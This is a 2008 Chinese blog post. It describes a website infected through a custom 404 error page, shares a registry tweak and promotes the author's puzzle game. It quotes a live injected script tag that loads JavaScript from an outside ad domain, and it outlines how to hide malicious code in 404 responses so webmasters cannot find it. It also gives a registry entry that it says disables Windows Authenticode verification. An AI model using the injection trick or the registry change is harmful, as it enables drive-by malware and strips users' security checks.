404挂马 + 杂谈 + AD

时间: 2008-03-18 / 分类: 未分类 / 浏览次数: / 0个评论 发表评论

http://www.688ip.com/dae5g45

今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:

<script src="http://ad.shitip.com/file/da.js"></script>

貌似最近第三次看到了;

P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

细想一下,这样是一个不错的挂马选择:

先把挂马代码插入到要返回的404信息里面;

然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;

只要URL的名称不是太难看,足以让一些站长昏头转向,找不着马来,对于我等找马的人来说也是挺麻烦的。

DI+#KE#=XD+I+K=E#XD+IK+$E=X+DIK##EXD$#IK#=E#$X=DI+K=EX#+D#IK$=EX++DIK$+E#+X+D=#I#K#$E=XD$=I$+K$$E=XD+$I=$K+

杂谈时间:

无意中发现了一样东西:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftSystemCertificatesTrustedPublisherSafer]
"AuthenticodeFlags"=dword:00000101

导入上面的注册表信息后,你将会发现Windows的文件校验失效,导致autoruns等调用微软的校验的软件全部失效,显示所有的文件都没有通过微软认证(SRENG等第三方的无碍);

还有QQ医生无法运行,证书也会出现问题,自动更新无法进行……

哈哈,还是挺好用的一个东西

+D$IKE#XDIKEXD$I#K$E#$X=D+#I#$K+E=X=#D#I++K+=EX##DI+=K=E$$XD$IK#+EX+DI$=KE#XDIK+EX=D=#IK++EXD$#IKEX=D

AD时间:

关于我弄的那个BLOG解谜游戏:One Place——Who Will Find It,貌似开始的谜题出得有点偏了,没有什么人玩,而且只有小花的进度比较快

后面的应该不会显得太偏了,有点像是那些密室游戏

顺便把“禁止贴出任何提示”这个禁令取消了,各位想贴什么就贴吧

您阅读此文共耗时

发表评论

你必须 登录后 才能留言!